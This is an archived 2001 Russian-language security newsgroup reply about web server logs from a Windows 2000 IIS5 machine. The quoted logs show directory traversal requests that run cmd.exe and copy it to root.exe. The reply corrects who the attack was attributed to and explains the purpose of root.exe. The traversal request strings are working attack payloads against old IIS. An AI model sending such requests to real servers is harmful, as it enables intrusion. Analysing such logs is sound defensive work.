|
|
ru.internet.security- RU.INTERNET.SECURITY --------------------------------------------------------- From : RyDen 2:5020/400 21 May 2001 05:54:59 To : All Subject : Re: Что это за тип атаки? -------------------------------------------------------------------------------- > BK> Сабж! W2k+SP1+IIS5. > BK> ------------------------------------------ > BK> 2001-05-12 13:57:51 203.228.240.19 - 212.164.101.33 80 GET > BK> /scripts/../../winnt/system32/cmd.exe /c+dir 200 - > BK> 2001-05-12 13:57:54 203.228.240.19 - 212.164.101.33 80 GET > BK> /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 - > BK> 2001-05-12 13:57:57 203.228.240.19 - 212.164.101.33 80 GET > BK> /scripts/../../winnt/system32/cmd.exe > BK> /c+copy+\winnt\system32\cmd.exe+root.exe 502 - > BK> 2001-05-12 13:58:00 203.228.240.19 - 212.164.101.33 80 GET > > Это автоматическая атака американской группы PoizonBox использует ошибку в IIS. > Это китайцы из H.O.C. - это во первых ,во-вторых PoizonBOX - это не группа ,а человек один ,из China Project ... Hу и в третьих - он совсем не американец ;) P.S. И последнее - root.exe никуда не просывается ,это копированный-переименованный cmd.exe ,а переименован для того что иначе многие команды недоступны ,да и просто из удобства из /scripts/ запускать.. ;) --- ifmail v.2.15dev5 * Origin: Golden Telecom (2:5020/400) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.internet.security/899067deb186.html, оценка из 5, голосов 10
|